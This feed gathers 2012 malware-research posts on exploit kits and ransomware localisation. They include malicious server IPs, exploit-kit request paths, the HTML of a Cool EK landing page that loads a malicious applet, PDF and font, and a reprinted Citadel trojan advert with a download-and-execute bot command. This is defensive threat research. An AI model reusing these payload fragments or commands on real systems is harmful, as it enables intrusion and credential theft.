Quantcast
Channel: Malware don't need Coffee
Viewing all 185 articles
Browse latest View live

1940 IPs for a BHEK/ULocker server - Nexcess-Net

$
0
0
We all remember the hack of Cryptome.org back in February 13th 2012, redirecting 2900 visitors to a "/Home/" Blackhole Exploit kit. (No ? Read cryptome.org thread about that).

Cryptome.org's post keeping readers aware of the situation in real time


I was already following that blackhole (and its ips ) since I started to dive in this field, so since December.

I decided to make a deeper search and found that the BH EK was hidding behind 2428 ips (Pastebin) on AS36444 almost all on NEXCESS-NET networks.

At that time I ensured this information reached Law Enforcement and decided to stop following that BH EK (too many IP rotation, too much work for one rotating payload).

Yesterday Jindrich Kubec (Avast) and Razor both remind me about that "/Home/ BH EK " that i was also seeing from time to time on URLQuery and MalwareDomainList.

I made a scan once again on AS36444 and there is right now 1915 ips (Pastebin) positive to that BH EK.

Winmerge of both files giving a rough idea of differences


I decided to take a look at what was being served :


Session of /Home/ Blackhole (1.2.5) Infection - Highligted : Payload

149.47.134.189 /Home/index.php

149.47.134.189 /Home/Gam.jar
149.47.134.189 /Home/w.php?f=16&e=2  cac5aeefd47e4e537f8f28430f2a3661 (vt link)
149.47.134.189 /Home/data/ap1.php?f=16
149.47.134.189 /Home/data/field.swf


The payload is ULocker (link to @Botnets_fr related page). Another occurence exposed by Xylitol two weeks ago



Screenshot of ULocker I made for Botnets.fr
ULocker initial advert by xfrzx
ULocker update announced by xfrzx


It could be over if that page was not hosted on, guess what ?, the "/Home/ BH EK" server.

Fiddler Trace of the call home from the ULocker ransomware bot.


cdnexits.com/Home /web2/gate.php
cdnexits.com/Home /web2/l/FR.php <-- depending of what gate.php reply.

List of Targeted Countries
I have highlighted the RO (Romania) cause in facts it's in English and it's a glitch that come from previous version of ULocker which is the only known ransomware targeting that country.

cdnexits.com -- 91.204.208.36
52148 | 91.204.208.0/22 | RACKSRV | UK | G-RAFF.COM | RACKSRV COMMUNICATIONS LIMITED


Scanning this range you can find 4 more IPs for the "/Home/ BH EK".


91.204.209.207
91.204.209.208
91.204.209.209
91.204.209.205

Scanning more widely "known" bad ranges you also find :

109.236.81.41 <- Could be the mother Ship.
129.121.35.109
129.121.35.166
129.121.35.173
129.121.35.183
129.121.35.253
129.121.35.36
129.121.35.37
129.121.35.38
129.121.35.39
129.121.35.40
193.33.186.241
193.33.186.242
193.33.186.243
193.33.186.244
193.33.186.245
213.5.176.130
213.5.176.131
213.5.176.132
213.5.176.133
213.5.176.134

Yes you can take any of these IP or from this pastebin and add "/Home/web2/l/DE.php" you'll get the German Landing for ULocker Ransomware.

1940 ips. The lack of IPv4 seems be a joke for some bad guys...(yes am thinking at the AS37599 at 75% occupied by a BH EK deploying Reveton two weeks ago)




Urausy improving its localization - A (the?) Gaelic Ransomware with Interpol impersonation as default landing

$
0
0
Urausy first appear at the end of July. It was just another Reveton "Me too" with a yellow square filled with a # instead of the "Camera" and targetting few countries :  DE, ES, FR, UK, US (PT? see at the end)

Based on what i was able to see of the distribution, I had the feeling at that time, that it was a Reveton distributor trying to run his own business.

Highlighted design of Urausy for US as of July/August
showing how you could visually distinguish it from Reveton
Few weeks ago Malekal spotted that the French design had the yellow square filled by hands cuffed going out of the screen of a laptop
At same time new country were being targeted : AT and CA 
Piece of the French Urausy Design with the yellow square
filled with the image of the hands cuffed

Yesterday Tachion from Safegroup.pl pointed me a new Design for Poland.
Screenshot I made for Botnets.fr of the
new Polish Design for Urausy spotted by Tachion
So I decided to make a small trip accross Europe..and know that Urausy is now targetting (at least)
BE, CH, FI, IE (the ? 'Gaelic Ransomware' ), LU, SE and all other countries (RU, UA included) with an Interpol Design (for PT see at the end)

Urausy default Design (09-2012) impersonating Interpol


Here are those design (you will find all known design on Urausy page of botnets.fr)

Urausy LU (09-2012)
Urausy FI (09-2012)
Urausy CH (09-2012)
Urausy BE (09-2012)
Urausy SE (09-2012)
And...Tada !! (yes. Overreaction, but As a "Ransom Art" lover I spent a full evening hunting it, when it was announced...without success. Note that Urausy has been tested and was showing the FBI Design, hence the "?" when i wrote the (?) Gaelic Ransomware)
Urausy IE (09-2012) The (?) Gaelic Ransomware
One Md5 : 58c5971869a315f12f319232d1f84f87

Note1 : Have trouble getting IP in Portugal. If anyone think he can help me catching new PT design for Urausy and Reveton drop a comment or contact me on twitter. Would be really appreciated.

Note2 : If you catch or hear about a Ransom Design that you can't find on Botnets.fr contact us via IRC or twitter. We are always happy to improve our collection.

Ransomware Casier - Sharing Design with Lyposit - Gaelic & Persian (?)

$
0
0
The Ransomware Casier (which is in my opinion the grand son of Goldenbaks ) has new clothes and it looks like the way affiliates are managed has changed too.

Malekal pointed me  a new evolution in the french design of Ransom Casier.

Screenshot of a part of Malekal's Post


Take a look at his post, it's showing one affiliate Panel that he was able to open. You'll see thats it's really different from the panel shown by Xylitol when he infiltrated the "Gangstaservice Winlock Affiliate"
In the past there was one server for all affiliates (as show by server folder tree + http calls) and illustrated by Xylitol. Now it looks like there is one server (or at least one vhost) by affiliate and a failover to master server (btw both seems not using same GeoIp Database). If you are interested in knowing more about that, you know how to contact me.

They are now using the same design (or should we say, the services of the same designer) as Lyposit.

Lyposit Designs (see Botnets.fr Lyposit page)

Casier Designs (see Botnets.fr Casier page)
Both do not have design for Italy and Greece.
Lyposit was trying to target Ireland (but failed) . It was targeting people with Irish keyboard with an Iranian design.

Lyposit IR Design


It was a mistake ( misunderstanding ?? between designer and creator of the Ransom Affiliate - ir != ie).
Casier is successfully targeting Ireland :
IE Design for Casier (One more (the?) Gaelic Ransomware)
but ...it has also a design for Iran (was not able to retrieve it, almost surely the same meaningless design that Lyposit was showing )

Available Design for Casier
There is also a US design that was not available for Lyposit. It's obviously a different job.
Casier US Design

Some Links :
Karagny.L unpack by RootBSD from Malware.Lu - 2012-09-04
Landings specific to Ireland (Landings_IE on Botnets.fr)
Lyposit page on botnets.fr
Casier page on botnets.fr
Goldenbaks page on botnets.fr (yes in my opinion it's the past of Casier)

From Sakura to Reveton via Smoke Bot - Or a Botnet Distribution of Reveton

$
0
0
   

In my study of Reveton's distribution, I encountered only Blackholes and another not named exploit kit ( which is now only spreading Urausy ). FBI warned about Reveton being spread via Citadel.

In this illustration it's not Citadel,  it's a Smoke Bot which is pushing the Reveton. 


Not so far..cause we often see Citadel pushing Smoke Bot...so it's just a matter of order/preference of the Botnet operator
(note that the Smoke Bot we will study is pushing a LOT of stuff among which Andromeda, Citadel, and for Russia/Ukraine Carberp (sic) )




For those who do not want to waste 5 minutes looking at the Video :
Smoke Bot calling home
Smoke Bot downloading Reveton Dll

Reveton calling Home


You can download the Fiddler Session of the Sakura Exploitation via CVE-2012-4681 
This Reveton Sample Call to Home in ThreatExpert report

Full pcap of the session (that include what you saw and other stuff)
See:

Some binaries inside the Pcap file

Urausy has big plan for Europe - Targeting 3 new countries among which Norway !

$
0
0
After adding a default Interpol design and new countries BE, CH, FI, IE (the ? 'Gaelic Ransomware' ), LU, SE past week, Urausy is now showing dedicated clothes to 3 new countries:
GR, DK, and NO (First - please correct me if i'm wrong - ransomware targeting Norway, hence this post)
Urausy - NO - 09-2012


Urausy - GR - 09-2012
Urausy - DK - 09-2012
The localisation work for this Ransomware is becoming really impressive.
Look by yourself :
Design Available for Urausy on 09-2012
Screenshot of Botnets.fr Gallery
In my opinion they are adding countries based on the hit number by country on the Interpol design
As usual, if you want to see more, you'll find all Urausy design, some http requests and md5 hashes on Botnets.fr/index.php/Urausy

Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel

$
0
0

Available to its client since second week of september, the Blackhole Exploit Kit has been, according to Paunch, its coder, rewritten from scratch (<- You'll see all announced features here) . URL patterns are now different. Most improvements are focused on making "defenders" job a little harder.
(For previous version of Blackhole see : Inside Blackhole Exploits Kit v1.2.4 )

New login screen with Captcha,
making bruteforce attack on the panel a little harder

BH EK 2.0 Menu
BH EK 1.x Menu



Statistics
On the panel I saw there were buttons that were not on SpiderLabs post and in 2 other css I gathered.

copy_txt button allowing raw copy of the Data
Css part related to the copy_txt button (on the Left what i found elsewhere)
Raw Copy popup



Getting Guest Statistics Link
( I hope someone by Symantec will read this, and they will fix their last post on pseudo fake BH )


Blocked Statistics


Threads


Thread Creation - Part1
Thread Creation - Part 2


Thread Parameters

Files
Soft Versions
Security Tab in BH EK 2.0


Security Tab in BH EK 2.0 (in English but not only for translation, look at Tor exit node number and dates)
режим записи = Recording Mode


As a comparison Security Tab in BH EK 1.x :
Security Tab in BH EK 1.X
The Bot list include IP range from altavista, excite, google, infoseek, lycos, 12.40.85.0/24 tagged as non_engines, northernlight, inktomi, many ranges tagged as misc, and around 8000 Ips tagged as mybots


"mybots" Ips


(According to SpiderLabs post these mybots can be updated,when you turn the blackhole in a monitoring mode that allow blacklisting of Ips landing on it when not supposed to)
режим записи - Recording Mode widget in Security Tab



Preferences
You want to read more ?
Following a lead of "Suspected" Blackhole2 - Malware Must Die! - unixfreaxjp - 2012-09-22
CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime) - Contagio - Mila - 2012-09-19
Blackhole Exploit Kit v2 - SpiderLabs - Daniel Chechik - 2012-09-13
Fast look at an infection by a Blackhole Exploit Kit 2.0 - 2012-09-12
Blackhole Exploit Kits update to v2.0 - 2012-09-12

<edit 26/09/12>Added Raw Copy popup</edit>

Redkit : No more money ! Traffic US, CA, GB, AU

$
0
0

It looks like "EULA" has changed for Redkit "customers" in the past 20 days, now you can't pay with money anymore for this "Exploit Kit as a Service".

Lucky Luke - Go West ! (Turkish Edition)


As written in the internal FAQ :

Мы работаем за 5% трафа. Если у вас в трафе нет US, CA, GB, AU — ваш аккаунт будет заблокирован.
Google Translate : "We work for 5% of the cores. If you do not have cores US, CA, GB, AU - your account will be blocked."

Нет оплаты — мы берем всего 5% вашего трафика
Google Translate :  "No payment - we take only 5% of your traffic"

Связка забирает траф или загрузки?
Связка забирает загрузки — в 5% случаев вместо вашего файла грузится наш

Translation by @ComradeDanski (The Malware Lab) : "Does the (exploit) kit take traffic or downloads?
The (exploit) kit takes downloads -- it replaces 5% or your traffic with our file"

Big trust from "customer" needed !
At beginning of September, and since at least April customer had choice :

Мы работаем либо за 5% трафа, либо $150 за неделю аренды ($500 за месяц). Если у вас в трафе нет US, CA, GB, AU — то сотрудничество возможно только за $.
Google Translate :  "We work for the 5% or cores, or $ 150 per week rent ($ 500 per month). If you do not have cores US, CA, GB, AU - that cooperation is possible only for the $."

One Redkit infection on the 7th of September 2012 :

Redkit infection : Downloader  who then goes for encrypted payloads
4.html : 207e6e6d9ee22838fc3972e307591a71

Karagny downloader according to A/Vs. It seems it's the default way for Redkit to drop its payload.

Last message from Redkit's coder.
"I love you, but its business"


Want to read more about Redkit ? 
Red Kit : Lucky Luke in Turkey
Redkit Exploit Kit : Detailed analyses of recent anti-forensics features - Denis Laskov - 2012-09-25
CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo -2012-08-30Redkit - one account = one color - 2012-06-22
Redkit not so red anymore - Adaptation in action - 2012-05-08
Inside RedKit Exploit Kit - 2012-05-05
A Wild Exploit Kit Appears... Meet RedKit - Arseny Levin - SpiderLabs - 2012-05-02

<edit1 28/09/12> Translation updated with info given by @ComradeDanski </edit1>

Update to Citadel : 1.3.5.1 Rain Edition.

$
0
0

A new version of Citadel has been announced : 1.3.5.1 Rain Edition.
Aquabox post

Original text of the advert : (Pastebin)









Самые современные средства и инструменты для профессиональной работы собраны специально для вас в новой версии.
Решены проблемы с отстуком и живучестью, работа стала еще приятнее, учтены самые важные пожелания.
Взят во внимание весь опыт работы за последний сезон, новичкам будет гораздо проще работать с новой версией, чем с предыдущими.
Теперь открыта в свободном доступе новая технология WebInjects для всех желающих.

[+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
[+] Возможность добавить бота в "Избранное" без отчетов.
[+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте: [Флаги]"
[+] Сортировка скриншотов по дате.
[+] Добавлена возможность подключения других БД Citadel (как удаленные БД, так и старые/отключенные админки) для поиска отчетов.
[+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
[+] Расширен Jabber уведомитель, добавлены следущие события:
- Маски BotID на событие "Бот вышел в Online"
- Уведомление при обнаружении конкретного ПО из "installed software"
- Маска на содержимое CMD отчета.
- Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
[+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
[+] Исправлена ошибка удаления отчетов.
[+] Авто-обновление статистики главной страницы.
[+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
[+] Добавлена возможность определения online/offline статуса у бота в API.
[+] Полностью переделан алгоритм проверки в модуле WebSocks.
[+] Отображение скриптов(команд) постранично.
[+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
[+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки: 
[+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
[+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
[+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
[+] Plaintext логи открываются в новой вкладке.
[+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
[+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
[+] Возможность указать в DnsFilters(перенаправление траффика) маски со звездочками (*), можно сделать маску более гибкой.
[+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Модуль работает через админку.
Краткий ликбез:
В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
Сушествует несколько режимов для паков.
Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя. 
[+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
[+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1). 
[+] Полностью перереботан мануал, теперь удобная навигация + раскрыты некоторые тонкости работы, а также добавлены ответы на популярные вопросы, с примерами. Изменено лицензионное соглашение, которое содержится в мануале.

Для получения новой версии, размещаем заявку в Jabber'e в таком формате: "<login в CRM> размещаю заявку на получение новой версии". Оплата поддержки должна быть своевременной, те, у кого задолжность более 3 месяцев - новую версию не получают. Срок выдачи от 3 до 72 часов. Если у вас имеется лицензированный партнер или саппорт, сразу пишите об этом в заявке до выдачи, а не после.

Для старых клиентов, обновление включено в абонентскую плату, для новых, цена базовой комплектации составляет теперь $3931.00

Jabber для покупки и обновлений: aquabox@lugmen.org.ar
Саппорт в праве отказать в продаже лицензии без объяснения причины. Поддержка клиентов на уровне сложных технических вопросов отменена из-за большого количества, обменивайтесь опытом с коллегами через CRM либо форумы.

----------------------------------
Google Translation : (Pastebin) - (if you want to correct this raw google translation, drop a comment or DM on Twitter )


The latest tools and tools for professional work collected for you in the new version.
Fixed problems with otstuk and vitality, work has become more pleasant, considered the most important requirements.
Taken into account the whole experience last season, beginners will be much easier to work with the new version than the previous ones.
Is now open for free access WebInjects new technology to the public.

[+] Did a quick check of bots on Online-status on the main list of page.
[+] Ability to add bot in the "Favorites" without reporting.
[+] Made detection system privileges (admin / user), is displayed in the "Information on bot [flags]"
[+] Sort by date screenshots.
[+] Added ability to connect to other databases Citadel (as remote database, and old / disabled admin) to search for reports.
[+] Expand your search in the database: you can specify the stop words, such as twitter.com, which will not appear in the issuance of the results, not to litter logging debris. Also, you can specify the contents of the search does not report, and for URL Mask, it increases the speed of data retrieval.
[+] Enhanced Jabber notifier added Next event:
- Masks BotID the event "Boat reached the Online"
- Be notified when a specific software from the "installed software"
- Mask to the contents of the report CMD.
- Parallel convenient entry in the log-file of all events, in addition to Jabber-notifications.
[+] Added a free module of grabbing cookies in Firefox, exports all the cookies from the browser and sends you.
[+] Fixed delete reports.
[+] Auto-Update Statistics homepage.
[+] Button [Decode] on the reports, which can decode urlencode (% 0D) sequences in a convenient form.
[+] Added the ability to determine the online / offline status of the bot in the API.
[+] Completely reworked the algorithm checks the module WebSocks.
[+] Show scripts (commands) by page.
[+] Added ability to send messages to a jabber api.php (uses your personal settings in the admin)
[+] Now, every HTTP / HTTPS report added cookies (Firefox / IE), as well as headlines:
[+] Completely redesigned internal encryption algorithm otstuk many times higher, longer survival. You need to migrate to the new version, run the command user_execute http://www.host.com/1351.exe. RC4 key must match.
[+] Adjust Browser Keylogger'a. Automatically adds a space if after the last key press was 5 seconds, you need to visually separate input-fields.
[+] Fixed an issue with a 302 redirect, did not work when inject, if you are following a link via javascript.
[+] Plaintext logs will open in a new tab.
[+] Fixed bots failure of the online when the GeoIP.
[+] Display the comment to the boat in the VNC-module by the mouse, as well as sending a comment to jabber with information about a connection.
[+] Ability to specify DnsFilters (redirect traffic) mask with an asterisk (*), you can make the mask more flexible.
[+] WebInjects. The module is designed for easy interaction with Holder through technology injected into browsers. The module allows any progruzit inject specific BotID, country or botnet in just a few minutes, without having to edit the config. The module works through the admin panel.
Brief educational program:
In config bot section DynamicConfig, fit parameter url_webinjects "http://www.host.com/file.php" (path to file.php). Boat pulls the file every 2 minutes, taking out a packet injector, which gives the distribution of the system of granting the injector.
From there VebInzhekty 2 sections: "The group vebinzhektov" and "Paki", the first is the structure of "group - injected - Members (admitted to the group)," and is responsible for managing all of the injector. The second section is responsible for setting the spread of the injector (which deliver bots inject and how much).
In the main menu, vrazdele "Users", creating a new user has rights "r_botnet_webinjects_coder" is a user who can manage the group, which will appoint an administrator privileges. In other words, if you make a developer injected in admin account and create it, it will have the right to form their own injector and edit them, others injected he sees only displays a list of his own group injected. Ie you can create 5 groups and create a 5-coders inject, so each person is responsible for their group (set injector). You see the statistics of what happens in the overall system and can unites all groups injected into one "pack", which will be progruzhen any and all bots, or a single category of boats in the class: a country or a botnet.
In the admin area, a special convenient visual editor injected with syntax highlighting. Format is fully compatible with zevsoformatom.
Image do several modes for packs.
Dual - when running a file with injected from the main config + vebinzhekty.
Single - when only vebinzhekty, and the local file with the injector is switched off.
Disabled - when vebinzhekty disabled, and local file with injector works.
If you accidentally make a mistake somewhere in the injector, the vebinzhekty be gathered together and you have to DEBUG-report with information which pack (bundle) was not assembled.
The information on the boat, you can see the history of injection test web injected, also, you can search DEBUG-bot reports and look at the history and compilation errors vebinzhektov.
If the bot receives several packs (bundles) where different modes of operation: dual, single, disabled then all Bandlov automatically selected the most "narrow mode", such as single.
Boat constantly checks for updates of any vebinzhektov, and if so, then it updates its host.
[+] Option in the config disable_httpgrabber expanded and allows to get rid of HTTP-reports sent to the server HTTPS-only reports on all browsers, if set to "1". Get rid of the extra load on the server.
[+] Added the section "HttpVipUrls" in WebFilters, which allows you to add links-exclusion (http://) in the absence of HTTP-grabbing (disable_httpgrabber 1).
[+] Fully pererebotan manual now easy navigation + revealed some details of the work, and also added the answers to frequently asked questions, with examples. Changed the license agreement, which is contained in the manual.

To get the new version, place a request in Jabber'e in this format: "<login CRM> in place an application for a new version." Payment of support must be timely, those with debts of more than 3 months - do not get the new version. Term delivery from 3 to 72 hours. If you have a licensed partner or a support, just write it in the application to the issue, and not after.

For existing customers, the update is included in the monthly fee for the new price of the basic configuration is now $ 3931.00

Jabber for purchases and upgrades: aquabox@lugmen.org.ar
A support of the right to refuse the sale of a license without giving a reason. Customer support at the level of the complex technical issues canceled due to the number, share experience with colleagues through CRM or forums.


----------------------------------
Want to read more ?
Inside Citadel 1.3.4.5 C&C & Builder - Botnet Control Panel - 2012-07-29
Update to Citadel : v.1.3.4.5 - 2012-06-11
Update to Citadel : v1.3.3.5 - 2012-04-03

Cool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop

$
0
0
Just for the  left panel Thumbnail :)
Stats page title


Sorry for the "read it live" post...the situation was moving while writing.

Few days ago i discovered that a bunch of reverse proxies that I was linking to same Blackhole Exploit Kit were in fact linked to 2 different Blackhole (quite surely operated by same team - I saw reverse proxies being redirected from one server to another one)

Trying to build a signature to know which server was behind a specific reverse, I found a new exploit kit.



Empty default stats

I fast noticed few things.
/r/pricelist.php is a PDF exploit.
/r/myadv.php is a Java pack.
/font.php is a Reveton PE.


I thought it would take weeks before it goes wild..but yesterday Malekal catched a landing spreading Reveton (blood.falawllp.info /r/l/town-proved.php ) and I immediately recognized that new EK. So  I hunted the malvertising and found another domain but same landing pointing to an already known Reverse Proxy.

Seems like it was time to take a deep look at this EK.

Small improvement, it looks like the "Sploit pack" is being checked by tools like Scan4you.




 When i first checked it, payload was not being pushed (all night long : no payload)

CVE-2012-4681 - IE - WinXP 32b
try.addsdice.com /r/l/town-proved.php <-- try.addsdice.com full of meaning no ?
try.addsdice.com /r/32size_font.eot <- ?
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/myadv.php.pack.gz <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/l//r/f.php?k=1 <-- Vuln tracer for owner (seems guest does not have access to vuln break %)


CVE-2012-4681 - Firefox - WinXP 32b
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/l//r/f.php?k=1

CVE-2012-0507 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot  <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx  /r/l//r/f.php?k=2

CVE-2012-1723 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot  <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /favicon.ico
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/f.php?k=4


MDAC (you should not be hurt):
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/32size_font.eot
21x.xx.11x.1xx /r/pricelist.php


Not up to date Win7 64b - IE -  (j7u7)
Note that there is NO payload on the EK right now, don't known how to be 100% sure the CVE is indeed active and that it's this CVE which is being used or a new thing...
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/64size_font.eot
try.addsdice.com /r/pricelist.php
try.addsdice.com /favicon.ico
try.addsdice.com /r/f.php?k=4  <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php


town-proved.php with IE  contains :

<style>@font-face{font-family:'p1';src:url('http://BEEPBEEP/64size_font.eot');}.duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style></head><body onload='try{window.focus();}catch(e){}'><div class='duqu'>:)</div><applet archive='http://BEEPBEEP/myadv.php' code='ja.jh' width='468' height='200'></applet><br><br><iframe src='http://BEEPBEEP/pricelist.php' width='468' height='468'></iframe></body></html>

Source code of the landing pushed to IE on x64 windows


.duqu <- aouch, eactly what we could expect from a font drop !


Cool EK Tree


file.dll is a Reveton.
myadv.php (jar) - at least CVE-2012-4681, CVE-2012-507, CVE-2012-1723


CVE-2012-4681 spotted in jar file from Cool EK


filelist.php (pdf) - CVE-2010-0188
3bffc22ce0e67144c1b10da968f32f4c (2012-10-03) - http://wepawet.iseclab.org/view.php?hash=3bffc22ce0e67144c1b10da968f32f4c&t=1349739053&type=js

32size_font.eot : 050fbef5c814b2981fa61b7fc6820cbd
64size_font.eot : fada0b184b5372863a0c51f7fef5e2d0

How good is the "breaking" percentage ?
Guest stats on 1 thread (we can estimte that it's Reveton Infection via one Traffer)

Stats are moving and i can't get infected by that thread. Look like they are testing the EK in Traffic Analyser mode.

[EDIT - While Writing this post]

Around 10am French time got infected. As expected : Reveton.
So the Exploit Kit moved to production mode again.

Tried to run the landing on a CVE-2011-3402 positive computer with java 7u7 got infected (but  it's not Java)

Payload: f15df53d8cca428d2dbe924fe1dff733
Reveton for those who do not know (look botnets.fr/index.php/Reveton)

Run it on a Fully patched IE 8/Windows on Win 64 and java 7u7 Not infection.


Tried to run the landing on a  "Not up to date Win7 x64"  positives computer without java : got infected


Payload : 106f1f7e3a24d1ae9af0efc0934a4dcb

Call Home from that Reveton payload.


Around 10:30 am : Malekal just found a new domain matching a known Reverse proxy that just switched from one BH EK server to this BH + Cool EK server.


I do not know what this font is about.
Is this a "new (?)" enabler for CVE-2012-4969. Is this another patched vuln from Internet Explorer ?
Am getting help to sort this out. Will update this post.

<edit1> got answer by Kaspersky Labs : it's CVE-2011-3402
so I s/CVE-2012-4969/CVE-2011-3402 this post...yes not ethical ;)
On my MDAC VM :
KB2676562 fix CVE-2011-3402
Removing this should allow exploitation - Work in progress.

</edit1>
<edit2>
After fighting hours with Updates and this EK (that was not Cool trust me) i came to conclusion that's it's not only CVE-2011-3402, and that explain maybe the "not so good" percentage of break.
It seems that if you have at least one of this component installed, you are not vuln to the "Duqu-like" font drop :
-KB2676562 - CVE-2011-3402
-KB2744842 - CVE-2012-4969
-KB2718523 - CVE-2012-1893/CVE-2012-1890
-Windows Explorer 9.0
Downgrading a Windows 7x64 bits to see required "missing" KB to get owned
-= mean i removed this Patch.
Sound not so awful. I add all md5, VT Link etc...and my future edit should be the Libtiff path if i find time , adding a map of the distribution of Reverse proxies and maybe link to the detailed/technical explanation of this "Duqu-like" font drop, if someone work on it.
</edit2>

Reveton Autumn Collection += AU,CZ, IE, NO & 17 new design

$
0
0
Cam on Reveton design (for the post's thumbnail :) )


After launching what I think is its own new "Cool" Exploit Kit initiating a new way in browser exploit pack to drop payload ("Duqu-like" font drop), the team  ( ? behind Reveton)
For those who do not know : Reveton (now) Old design  ..Summer Collection ;)



 is using it to spread Reveton which dress from its C&C with a new "Autumn Collection" and is targeting at least 4 new countries : AU,CZ, IE & NO

Find the one built for you :

Reveton US/Default (10-2012)
New target for Reveton : Ireland
Reveton IE (10-2012) 5th to target this country (after Casier, Weelsof , Urausy, Epubb see : https://www.botnets.fr/index.php/Landings_IE )
New target for Reveton Norway
Reveton NO (10-2012) 3rd to target this country (after Gimemo & Urausy https://www.botnets.fr/index.php/Landings_NO )
New target for Reveton : Australia
Reveton AU (10-2012) 2nd to target Australia after Urausy
https://www.botnets.fr/index.php/Landings_AU
New target for Reveton: Czech Republic

Reveton CZ (10-2012) 2nd to Target CZ after Urausy
https://www.botnets.fr/index.php/Landings_CZ


Reveton CA (10-2012)

Reveton FR (10-2012)
Reveton NL (10-2012)
Reveton AT (10-2012)
Reveton DE (10-2012)
Reveton GR (10-2012)
Reveton FI (10-2012)
Reveton LU (10-2012)
Reveton PL (10-2012)
Reveton ES (10-2012)
Reveton SE (10-2012)
Reveton CH (10-2012)


Reveton Design on Botnets.fr (missing BE,UK and PT) - so at least 21 design



Server replying to same domain that past weeks (cf Cool EK and Sakura/Smoke/Reveton) :

Reveton call home


The good news : maybe less people will make confusion between Urausy & Reveton....till another copy cat

Notes : based on my tests : DK (but quite sure it's an Geoloc glitch and there is a design), LV, RO, RU -> Default (FBI).
Am having trouble to gather : BE & UK design. And as usual I can't download design in Portugal. Contact me if you think you can help

Want to read more about Reveton ?
Inside a ‘Reveton’ Ransomware Operation - Brian Krebs - Krebsonsecurity - 2012-08-13
Fake FBI Ransomware analysis - Hynek Blinka - Avg - 2012-06-19
Reveton.A - Microsoft Threat Encyclopedia

